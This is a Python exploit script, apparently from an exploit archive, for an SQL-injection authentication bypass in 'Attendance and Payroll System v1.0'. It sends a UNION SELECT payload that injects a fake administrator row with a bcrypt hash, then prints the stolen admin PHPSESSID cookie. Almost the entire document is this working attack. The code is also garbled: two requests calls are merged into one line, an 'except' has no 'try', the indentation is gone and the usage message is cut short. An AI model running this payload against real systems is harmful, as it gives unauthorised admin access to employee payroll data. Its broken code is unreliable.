# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass  
# Date: 04/03/2022  
# Exploit Author: pr0z  
# Vendor Homepage:  
# Software Link:  
# Version: v1.0  
# Tested on: Linux, MySQL, Apache  
import requests  
import sys  
from requests.exceptions import ConnectionError  
print('\n >> Attendance and Payroll System v1.0')  
print(' >> Authentication Bypass through SQL injection')  
print(' >> By pr0z\n')  
login_path = '/apsystem/admin/login.php'  
index_path = '/apsystem/admin/index.php'  
payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="  
headers = {'Content-Type': 'application/x-www-form-urlencoded'}  
#proxies = {'http': '', 'https': ''}  
# Check for arguments  
if len(sys.argv) < 2 or '-h' in sys.argv:  
print("[!] Usage: python3")  
# Bypass Authentication  
target = sys.argv[1]  
print("[+] Extracting Administrator cookie using SQLi ...")  
sess = requests.Session()  
sess.get(target + index_path,headers=headers, verify=False) + login_path, data=payload, headers=headers,verify=False)  
except ConnectionError:  
print('[-] We were unable to establish a connection')  
cookie_val = sess.cookies.get_dict().get("PHPSESSID")  
print("[+] Use the following cookie:\n")  
print(f"PHPSESSID: {cookie_val}")